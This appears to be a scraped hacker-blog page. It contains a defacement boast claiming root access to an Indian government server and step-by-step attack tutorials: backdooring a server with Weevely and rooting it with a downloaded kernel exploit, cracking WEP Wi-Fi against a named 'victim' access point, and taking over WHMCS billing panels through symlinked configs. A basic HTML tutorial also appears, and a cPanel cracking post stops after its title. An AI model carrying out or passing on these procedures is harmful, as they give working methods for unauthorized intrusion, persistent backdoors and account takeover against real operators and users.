0

Indian GOV Hacked

Today , Indian Again Got PwneD XD
Hacked GOV = 

 HackeD By H4x0r HuSsY
 Pakistani Leet H4x0r made a Visit
PAKISTAN ZINDABAD

HOST : GOA.GOV.IN
id : uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

H4x0r.HuSsY@ymail.com

Click here to find me on FB – Twitter

We Are : H4x0r HuSsY 1337 H4x0rL1f3 Invectus KhantastiC HaXoR |Shadow008

0

Rooting a Server with Weevely

Hi GuYs 
Today we will learn to Root A Server with Weevely 🙂
Weevely is a python script to backconnect to the shell and makes the tiniest backdoor to connect 🙂
You can google it and Its Mostly used by the people which dont have open ports 🙂
So Our Tutorial Starts from here 😉
First of all Open Weevely 🙂
Now type “./main.py -g -o /root/Desktop/backdoor.php -p r00T”
By this command it will make a backdoor.php in Desktop with Password: r00T
===========================================================
Now Next Step is to upload our backdoor to the server by shell and then
type “./main.py -t -u http://www.target.com/uploads/backdoor.php -p r00T” 
and then it will connect to the server 🙂
===========================================================
Now We have to find the version of the kernel its using 🙂
For Finding that type : “uname -a” and then it will show you the kernel version.
for example my kernel version is 2.6.18 2012 so I will find a local root exploit for 
2.6.18 2012 kernel version 🙂
Rooting depends on local root exploits.
===========================================================
We will use “WGET” to download the local root exploit 🙂
First change the dir to “tmp”
now type: “cd /tmp/”
and now download exploit 🙂
and then we have to compile it by this command 
“gcc 2.6.18.c -o KiDSec”
and then  it will be compiled 🙂
Now chmod 777 KiDSec
By typing ” chmod 777 KiDSec”
===========================================================
Now Just Simply run exploit by typing 
./KiDSec
===========================================================
Y0 Server Rooted !!
Now to check if Server is rooted so type “id”
and then it should say 
“uid=(root) gid=(root)”
==========================================================
Thanks For Reading My Tutorial 🙂
./TR4CK3R
0

HTML Tutorial

Hi Guys !! 🙂

TOday we will learn HTML 🙂
HTML have 3 Main Tags :

Adding the End tag is important !!

End-tag is like  

.SO there are 3 main tags in html 🙂

In

You can add the Tab title Like :

Learning HTML!

So this was our Code when we add Tab Title in our code 🙂
There are many other tags but i told you the main three 🙂
So the Display thongs are always shown in 🙂
There are also some tags for the font size 🙂
  • (Heading 1)

  • (Heading 2)

  • (Heading 3)

and all like that continues 🙂
and for writing Paragraph there is tag for that.

So if we write Paragraphs and Heading in our html document so our code will be 🙂

Testing!

Its Just testing

Testing !

This is written by KidSec and m learning

So this will be our Code 🙂
Now we learned to add simple text 🙂
Now we will learn to change the color of the text  with CSS 🙂
For CSS we will write something like this 🙂




Testing!

Its Just testing

Testing !

This is written by KidSec and m learning


Now I Hope you understand that how to change color of the text and changing the color of

the Background is also as easy as it was 🙂

We will not add tag , in the replacement we will add “”
And our Code will Look Like :







Testing!

Its Just testing


Testing !


This is written by KidSec and m learning






Now We learn’t to change the background color too 🙂
NOw The NExt Step is to add image 🙂
For adding Image we’ll put the code “
So Now our Code will look like 🙂

Testing!<img src="http://comstat.memecdn.com/images/comment/1403.png” alt=Sorry”>

Its Just testing

Testing !

This is written by KidSec and m learning


Now We Added Image too in our code 🙂
Now The NExt Step is to add a video in it 🙂
So for adding video we will put 
“<iframe src="videolink.com" hieght="250" width="350" “
So after adding Video to our Code 🙂 It will look like :



Testing!

Its Just testing


Testing !


This is written by KidSec and m learning


<iframe src="http://player.vimeo.com/video/65492621&quot; width="350" height="250"



Now we Will Try to add javascript in our html code 🙂
for adding javascript , i told you that the thing that is shown is always in
So javascript is not a text  so we will add javascript in

We Will add this javascript :

alert(“KidSec.com”) 

And when we will add it in our code so it will look like 🙂 

alert(“KidSec.Com”)
Testing!

Its Just testing

Testing !

This is written by KidSec and m learning

<iframe src="http://player.vimeo.com/video/65492621&quot; width="350" height="250"

  


and YoHo We added JavaScript in our Code 🙂
These were the most Important things that I Told Today 😉
Wait for the Second Part 😉
Take Care 😉
Bye 🙂


2

Crack WEP Wifi Password

Tools Needed:
  • Backtrack with aircrack-ng installed
  • Wi-Fi adapter capable of injecting packets.
.
Note: We are not responsible for any illegal attempts.

I am using Alfa AWUS036H most used CARD & simulates perfect with Backtrack.
Check your wifi compatible lists here.
.
Step 1:
Run Backtrack And plugin your Wifi adpter.
Open New konsole and type : ifconfig wlan0 up
.
.Step 2:
wlan0 is the name of the wireless card that i used, It can also be different.
To Check all wireless cards that are connected to your system, Type: ” iwconfig “.
.
Step 3:
Now Set your WiFi Adapter on Monitor Mode
Monitor mode lets your router to listen almost every packet in air.
To enable monitor mode, Type : airmon-ng start (your interface)
Example :- airmon-ng start wlan0
.
.Step 4:
New interface mon0 has been created.
To check your new interface, Type: “iwconfig mon0” as shown in fig.
.
.Step 5:
Now find a Network protected by WEP key.
To discover surrounding networks, Type : airodump-ng mon0
.
.
BSSID == Mac address of the AP.
CH == Channel broadcasted in which AP.
ESSID == Name broadcasted by the AP
Cipher == Shows encryption type
.
Step 6:
Now check for network, My Victim for this tutorial is ” linksys ”
To Crack it’s Password or we can say WEP Key, you have to capture Victim’s Data into file.
We again use airodump tool to target a specific AP and channel. You must restrict monitoring to single Channel to get data boost-up.
Type: airodump-ng mon0 –bssid -c (channel ) -w (file name to save )
.
.
As my Victim is broadcasted in channel 6, with BSSID “98:fc:11:c9:14:22″
So i Save the captured DATA as “RHAWEP”
Type : airodump-ng mon0 –bssid 98:fc:11:c9:14:22 -c 6 -w RHAWEP
.
Step 7:
To Crack password at-least 20,000 packets must be captured, 2 methods are being used for this purpose.
1st method == Passive attack: Wait for the Victim to connect to AP & then start Capture packets, This is a bit slower method.
2nd method == Active attack: You have to make a fake authentication (connect) with AP by generating and injecting packets, This is fast method and i am also using this method.
Active method can be done by this commands. Type : aireplay-ng – 1 3 -a (bssid of the target ) (interface)
.
.
I am using this command aireplay-ng -1 3 -a 98:fc:11:c9:14:22 mon0
.
Step 8:
After successfully done with fake authentication, Now generate & inject ARP packets.
Open a new konsole and type : aireplay-ng 3 -b (bssid of target) -h ( Mac address of mon0) (interface)
In my Case: aireplay-ng 3 -b 98:fc:11:c9:14:22 -h 00:c0:ca:50:f8:32 mon0
.
..
If this step was successfully done you will see a lot of packets in airodump capture.
.
.Step 9:
Now Keep calm and wait for 20,000 packets. It would be much easier if you wait for 80-90K packets.
After getting enough packets, Click on the mark present on terminal.
.
Step 10:
Open a new konsole & Enter the below command to Crack WEP Key.
Type: aircrack-ng (name of the file )
In my Case i used : aircrack-ng RHAWEP-0.1-cap
Aircrak will crack the WEP key within few minutes.
.
.Note :
Once you get the output, Remove colons and you’ll get WEP Key.
0

WHMCS Hacking

Hello Friends 🙂
I’m BaCk with A Great Tutorial again 😉
ToDay We Will Hack into WHMCS which is also called as billing panel and domains are also registered and suspended thorugh WHMCS Panel 🙂
Things We Need:
  • Symlink Enable Shell
  • Symlink Files
  • My Tutorial 😉
Now Lets Start 
First Go to The Shell and Symlink it  There are many Tutorials on Symlink so you can easily learn
Now The Thing is that we should get the config of WHMCS in the server  like
the config named .. xyz~~whm.txt
open that config and Copy the configuration and log into the databse through sql.php or DBKiss and then go to the table
named “tbladmins”. Edit the password into your own but in md5 and change username if u want 
then save and then copy the name of config like xyz~~whm.txt is the config so copy “xyz” as a user and search it in domains.php and you’ll get the 
url of website  then click on symlink and search directories like .. most of the whmcs have billing panel in /clients/admin/ .
Then after opening … login as the details you filled in the database but you’ll not enter the password in md5 and you’ll write the password which you encrypted in md5 .
I Hope Everybody Enjoyed
./TR4CK3R
0

cPanel Cracking

Hello Friends 😉
Heres TR4CK3R Today with an Interesting Tutorial FoR YoU GuYz 😉
So ToDay I Will Teach you All  ” cPanel Cracking”
cPanel is used for uploading files or documents on the server like upload mybb files and installing mybb forum.
Same like that every admin uses cPanel on his/her website to upload his/her documents or files and We’re Gonna Crack That Now 😉

Requirements:

Tutorial: